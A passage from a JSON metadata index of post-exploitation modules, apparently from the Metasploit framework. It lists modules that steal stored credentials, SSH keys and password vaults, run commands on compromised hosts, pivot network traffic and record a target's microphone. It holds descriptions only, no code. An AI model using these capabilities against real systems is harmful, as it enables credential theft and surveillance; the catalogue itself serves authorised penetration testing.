"platform": "BSD,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 19:38:43 +0000",
"path": "/modules/post/multi/gather/dns_srv_lookup.rb",
"is_install_path": true,
"ref_name": "multi/gather/dns_srv_lookup",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/docker_creds": {
"name": "Multi Gather Docker Credentials Collection",
"full_name": "post/multi/gather/docker_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Flibustier"
],
"description": "This module will collect the contents of all users' .docker directories on the targeted\n machine. If the user has already push to docker hub, chances are that the password was\n saved in base64 (default behavior).",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-25 18:15:24 +0000",
"path": "/modules/post/multi/gather/docker_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/docker_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/enum_vbox": {
"name": "Multi Gather VirtualBox VM Enumeration",
"full_name": "post/multi/gather/enum_vbox",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will attempt to enumerate any VirtualBox VMs on the target machine.\n Due to the nature of VirtualBox, this module can only enumerate VMs registered\n for the current user, therefore, this module needs to be invoked from a user context.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-30 15:45:52 +0000",
"path": "/modules/post/multi/gather/enum_vbox.rb",
"is_install_path": true,
"ref_name": "multi/gather/enum_vbox",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/env": {
"name": "Multi Gather Generic Operating System Environment Settings",
"full_name": "post/multi/gather/env",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"egypt <egypt@metasploit.com>"
],
"description": "This module prints out the operating system environment variables",
"references": [
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/env.rb",
"is_install_path": true,
"ref_name": "multi/gather/env",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/fetchmailrc_creds": {
"name": "UNIX Gather .fetchmailrc Credentials",
"full_name": "post/multi/gather/fetchmailrc_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jhart@spoofed.org>"
],
"description": "Post Module to obtain credentials saved for IMAP, POP and other mail\n retrieval protocols in fetchmail's .fetchmailrc",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/fetchmailrc_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/fetchmailrc_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/filezilla_client_cred": {
"name": "Multi Gather FileZilla FTP Client Credential Collection",
"full_name": "post/multi/gather/filezilla_client_cred",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bannedit <bannedit@metasploit.com>",
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will collect credentials from the FileZilla FTP client if it is installed.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/filezilla_client_cred.rb",
"is_install_path": true,
"ref_name": "multi/gather/filezilla_client_cred",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/find_vmx": {
"name": "Multi Gather VMWare VM Identification",
"full_name": "post/multi/gather/find_vmx",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will attempt to find any VMWare virtual machines stored on the target.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/find_vmx.rb",
"is_install_path": true,
"ref_name": "multi/gather/find_vmx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/firefox_creds": {
"name": "Multi Gather Firefox Signon Credential Collection",
"full_name": "post/multi/gather/firefox_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bannedit <bannedit@metasploit.com>",
"xard4s",
"g0tmi1k"
],
"description": "This module will collect credentials from the Firefox web browser if it is\n installed on the targeted machine. Additionally, cookies are downloaded. Which\n could potentially yield valid web sessions.\n\n Firefox stores passwords within the signons.sqlite database file. There is also a\n keys3.db file which contains the key for decrypting these passwords. In cases where\n a Master Password has not been set, the passwords can easily be decrypted using\n 3rd party tools or by setting the DECRYPT option to true. Using the latter often\n needs root privileges. Also be warned that if your session dies in the middle of the\n file renaming process, this could leave Firefox in a non working state. If a\n Master Password was used the only option would be to bruteforce.\n\n Useful 3rd party tools:\n + firefox_decrypt (https://github.com/Unode/firefox_decrypt)\n + pswRecovery4Moz (https://github.com/philsmd/pswRecovery4Moz)",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/firefox_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/firefox_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/gpg_creds": {
"name": "Multi Gather GnuPG Credentials Collection",
"full_name": "post/multi/gather/gpg_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Dhiru Kholia <dhiru@openwall.com>"
],
"description": "This module will collect the contents of all users' .gnupg directories on the targeted\n machine. Password protected secret keyrings can be cracked with John the Ripper (JtR).",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-28 10:16:59 +0000",
"path": "/modules/post/multi/gather/gpg_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/gpg_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/irssi_creds": {
"name": "Multi Gather IRSSI IRC Password(s)",
"full_name": "post/multi/gather/irssi_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jonathan Claudius <jclaudius@mozilla.com>"
],
"description": "This module grabs IRSSI IRC credentials.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/irssi_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/irssi_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/jboss_gather": {
"name": "Jboss Credential Collector",
"full_name": "post/multi/gather/jboss_gather",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Koen Riepe (koen.riepe <Koen Riepe (koen.riepe@fox-it.com)>"
],
"description": "This module can be used to extract the Jboss admin passwords for version 4,5 and 6.",
"references": [
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/jboss_gather.rb",
"is_install_path": true,
"ref_name": "multi/gather/jboss_gather",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/jenkins_gather": {
"name": "Jenkins Credential Collector",
"full_name": "post/multi/gather/jenkins_gather",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"thesubtlety"
],
"description": "This module can be used to extract saved Jenkins credentials, user\n tokens, SSH keys, and secrets. Interesting files will be stored in\n loot along with combined csv output.",
"references": [
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-09-10 15:25:09 +0000",
"path": "/modules/post/multi/gather/jenkins_gather.rb",
"is_install_path": true,
"ref_name": "multi/gather/jenkins_gather",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/lastpass_creds": {
"name": "LastPass Vault Decryptor",
"full_name": "post/multi/gather/lastpass_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Alberto Garcia Illera <agarciaillera@gmail.com>",
"Martin Vigo <martinvigo@gmail.com>",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module extracts and decrypts LastPass master login accounts and passwords,\n encryption keys, 2FA tokens and all the vault passwords",
"references": [
"URL-http://www.martinvigo.com/even-the-lastpass-will-be-stolen-deal-with-it"
],
"platform": "Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-30 15:45:52 +0000",
"path": "/modules/post/multi/gather/lastpass_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/lastpass_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/maven_creds": {
"name": "Multi Gather Maven Credentials Collection",
"full_name": "post/multi/gather/maven_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"elenoir"
],
"description": "This module will collect the contents of all users settings.xml on the targeted\n machine.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-26 17:52:11 +0000",
"path": "/modules/post/multi/gather/maven_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/maven_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/multi_command": {
"name": "Multi Gather Run Shell Command Resource File",
"full_name": "post/multi/gather/multi_command",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will read shell commands from a resource file and\n execute the commands in the specified Meterpreter or shell session.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/multi_command.rb",
"is_install_path": true,
"ref_name": "multi/gather/multi_command",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/netrc_creds": {
"name": "UNIX Gather .netrc Credentials",
"full_name": "post/multi/gather/netrc_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jhart@spoofed.org>"
],
"description": "Post Module to obtain credentials saved for FTP and other services in .netrc",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/netrc_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/netrc_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/pgpass_creds": {
"name": "Multi Gather pgpass Credentials",
"full_name": "post/multi/gather/pgpass_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Zach Grace <zgrace@403labs.com>"
],
"description": "This module will collect the contents of all users' .pgpass or pgpass.conf\n file and parse them for credentials.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/pgpass_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/pgpass_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/pidgin_cred": {
"name": "Multi Gather Pidgin Instant Messenger Credential Collection",
"full_name": "post/multi/gather/pidgin_cred",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bannedit <bannedit@metasploit.com>",
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will collect credentials from the Pidgin IM client if it is installed.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/pidgin_cred.rb",
"is_install_path": true,
"ref_name": "multi/gather/pidgin_cred",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/ping_sweep": {
"name": "Multi Gather Ping Sweep",
"full_name": "post/multi/gather/ping_sweep",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Performs IPv4 ping sweep using the OS included ping command.",
"references": [
],
"platform": "BSD,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/ping_sweep.rb",
"is_install_path": true,
"ref_name": "multi/gather/ping_sweep",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/remmina_creds": {
"name": "UNIX Gather Remmina Credentials",
"full_name": "post/multi/gather/remmina_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "Post module to obtain credentials saved for RDP and VNC from Remmina's configuration files.\n These are encrypted with 3DES using a 256-bit key generated by Remmina which is (by design)\n stored in (relatively) plain text in a file that must be properly protected.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-30 15:45:52 +0000",
"path": "/modules/post/multi/gather/remmina_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/remmina_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/resolve_hosts": {
"name": "Multi Gather Resolve Hosts",
"full_name": "post/multi/gather/resolve_hosts",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "Resolves hostnames to either IPv4 or IPv6 addresses from the perspective of the remote host.",
"references": [
],
"platform": "Python,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/resolve_hosts.rb",
"is_install_path": true,
"ref_name": "multi/gather/resolve_hosts",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/rsyncd_creds": {
"name": "UNIX Gather RSYNC Credentials",
"full_name": "post/multi/gather/rsyncd_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "Post Module to obtain credentials saved for RSYNC in various locations",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/rsyncd_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/rsyncd_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/rubygems_api_key": {
"name": "Multi Gather RubyGems API Key",
"full_name": "post/multi/gather/rubygems_api_key",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jonathan Claudius <jclaudius@trustwave.com>",
"Brandon Myers <bmyers@trustwave.com>"
],
"description": "This module obtains a user's RubyGems API key from ~/.gem/credentials.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/rubygems_api_key.rb",
"is_install_path": true,
"ref_name": "multi/gather/rubygems_api_key",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/run_console_rc_file": {
"name": "Multi Gather Run Console Resource File",
"full_name": "post/multi/gather/run_console_rc_file",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will read console commands from a resource file and\n execute the commands in the specified Meterpreter session.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/run_console_rc_file.rb",
"is_install_path": true,
"ref_name": "multi/gather/run_console_rc_file",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/skype_enum": {
"name": "Multi Gather Skype User Data Enumeration",
"full_name": "post/multi/gather/skype_enum",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will enumerate Skype account settings, contact list, call history, chat logs,\n file transfer history, and voicemail logs, saving all the data to CSV files for analysis.",
"references": [
],
"platform": "OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/skype_enum.rb",
"is_install_path": true,
"ref_name": "multi/gather/skype_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/ssh_creds": {
"name": "Multi Gather OpenSSH PKI Credentials Collection",
"full_name": "post/multi/gather/ssh_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jim Halfpenny"
],
"description": "This module will collect the contents of all users' .ssh directories on the targeted\n machine. Additionally, known_hosts and authorized_keys and any other files are also\n downloaded. This module is largely based on firefox_creds.rb.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/ssh_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/ssh_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/thunderbird_creds": {
"name": "Multi Gather Mozilla Thunderbird Signon Credential Collection",
"full_name": "post/multi/gather/thunderbird_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will collect credentials from Mozilla Thunderbird by downloading\n the necessary files such as 'signons.sqlite', 'key3.db', and 'cert8.db' for\n offline decryption with third party tools.\n\n If necessary, you may also set the PARSE option to true to parse the sqlite\n file, which contains sensitive information such as the encrypted username/password.\n However, this feature is not enabled by default, because it requires SQLITE3 gem\n to be installed on your machine.",
"references": [
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/multi/gather/thunderbird_creds.rb",
"is_install_path": true,
"ref_name": "multi/gather/thunderbird_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/tomcat_gather": {
"name": "Gather Tomcat Credentials",
"full_name": "post/multi/gather/tomcat_gather",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Koen Riepe <koen.riepe@fox-it.com>"
],
"description": "This module will attempt to collect credentials from Tomcat services running on the machine.",
"references": [
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/tomcat_gather.rb",
"is_install_path": true,
"ref_name": "multi/gather/tomcat_gather",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/wlan_geolocate": {
"name": "Multiplatform WLAN Enumeration and Geolocation",
"full_name": "post/multi/gather/wlan_geolocate",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Tom Sellers <tom@fadedcode.net>"
],
"description": "Enumerate wireless networks visible to the target device.\n Optionally geolocate the target by gathering local wireless networks and\n performing a lookup against Google APIs.",
"references": [
],
"platform": "Android,BSD,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-02 11:38:20 +0000",
"path": "/modules/post/multi/gather/wlan_geolocate.rb",
"is_install_path": true,
"ref_name": "multi/gather/wlan_geolocate",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/general/close": {
"name": "Multi Generic Operating System Session Close",
"full_name": "post/multi/general/close",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module closes the specified session. This can be useful as a finisher for automation tasks",
"references": [
],
"platform": "Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/general/close.rb",
"is_install_path": true,
"ref_name": "multi/general/close",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/general/execute": {
"name": "Multi Generic Operating System Session Command Execution",
"full_name": "post/multi/general/execute",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module executes an arbitrary command line",
"references": [
],
"platform": "Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/general/execute.rb",
"is_install_path": true,
"ref_name": "multi/general/execute",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/general/wall": {
"name": "Write Messages to Users",
"full_name": "post/multi/general/wall",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module utilizes the wall(1) or write(1) utilities, as appropriate,\n to send messages to users on the target system.",
"references": [
],
"platform": "Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/general/wall.rb",
"is_install_path": true,
"ref_name": "multi/general/wall",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/autoroute": {
"name": "Multi Manage Network Route via Meterpreter Session",
"full_name": "post/multi/manage/autoroute",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"todb <todb@metasploit.com>",
"Josh Hale \"sn0wfa11\" <jhale85446@gmail.com>"
],
"description": "This module manages session routing via an existing\n Meterpreter session. It enables other modules to 'pivot' through a\n compromised host when connecting to the named NETWORK and SUBMASK.\n Autoadd will search a session for valid subnets from the routing table\n and interface list then add routes to them. Default will add a default\n route so that all TCP/IP traffic not specified in the MSF routing table\n will be routed through the session when pivoting. See documentation for more\n 'info -d' and click 'Knowledge Base'",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/manage/autoroute.rb",
"is_install_path": true,
"ref_name": "multi/manage/autoroute",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/dbvis_add_db_admin": {
"name": "Multi Manage DbVisualizer Add Db Admin",
"full_name": "post/multi/manage/dbvis_add_db_admin",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"David Bloom"
],
"description": "Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases\n (With GUI). The remote database can be accessed from the command line without the need\n to authenticate, which can be abused to create an administrator in the database with the\n proper database permissions. Note: This module currently only supports MySQL.",
"references": [
"URL-http://youtu.be/0LCLRVHX1vA"
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/manage/dbvis_add_db_admin.rb",
"is_install_path": true,
"ref_name": "multi/manage/dbvis_add_db_admin",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"post_multi/manage/dbvis_query": {
"name": "Multi Manage DbVisualizer Query",
"full_name": "post/multi/manage/dbvis_query",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"David Bloom"
],
"description": "Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases\n (With GUI). The remote database can be accessed from the command line without the need\n to authenticate, and this module abuses this functionality to query and will store the\n results.\n\n Please note: backslash quotes and your (stacked or not) queries should\n end with a semicolon.",
"references": [
"URL-http://youtu.be/0LCLRVHX1vA"
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/manage/dbvis_query.rb",
"is_install_path": true,
"ref_name": "multi/manage/dbvis_query",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/hsts_eraser": {
"name": "Web browsers HSTS entries eraser",
"full_name": "post/multi/manage/hsts_eraser",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Sheila A. Berta (UnaPibaGeek)"
],
"description": "This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,\n Google Chrome, Opera, Safari and wget.",
"references": [
"URL-http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html",
"URL-https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf"
],
"platform": "Linux,OSX,Unix,Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-03 02:18:30 +0000",
"path": "/modules/post/multi/manage/hsts_eraser.rb",
"is_install_path": true,
"ref_name": "multi/manage/hsts_eraser",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/multi_post": {
"name": "Multi Manage Post Module Macro Execution",
"full_name": "post/multi/manage/multi_post",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"carlos_perez <carlos_perez@darkoperator.com>"
],
"description": "This module will execute a list of modules given in a macro file in the format\n of <module> <opt=val,opt=val> against the select session checking for compatibility\n of the module against the sessions and validation of the options provided.",
"references": [
],
"platform": "Linux,OSX,Solaris,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/manage/multi_post.rb",
"is_install_path": true,
"ref_name": "multi/manage/multi_post",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/open": {
"name": "Open a file or URL on the target computer",
"full_name": "post/multi/manage/open",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Eliott Teissonniere"
],
"description": "This module will open any file or URL specified with the URI format on the\n target computer via the embedded commands such as 'open' or 'xdg-open'.",
"references": [
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-21 16:46:15 +0000",
"path": "/modules/post/multi/manage/open.rb",
"is_install_path": true,
"ref_name": "multi/manage/open",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/play_youtube": {
"name": "Multi Manage YouTube Broadcast",
"full_name": "post/multi/manage/play_youtube",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will broadcast a YouTube video on specified compromised systems. It will play\n the video in the target machine's native browser. The VID datastore option is the \"v\"\n parameter in a YouTube video's URL.\n\n Enabling the EMBED option will play the video in full screen mode through a clean interface\n but is not compatible with all videos.\n\n This module will create a custom profile for Firefox on Linux systems in the /tmp directory.",
"references": [
],
"platform": "Android,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-23 10:13:44 +0000",
"path": "/modules/post/multi/manage/play_youtube.rb",
"is_install_path": true,
"ref_name": "multi/manage/play_youtube",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"SideEffects": [
"artifacts-on-disk",
"audio-effects",
"screen-effects"
]
}
},
"post_multi/manage/record_mic": {
"name": "Multi Manage Record Microphone",
"full_name": "post/multi/manage/record_mic",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will enable and record your target's microphone.\n For non-Windows targets, please use Java meterpreter to be\n able to use this feature.",
"references": [
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
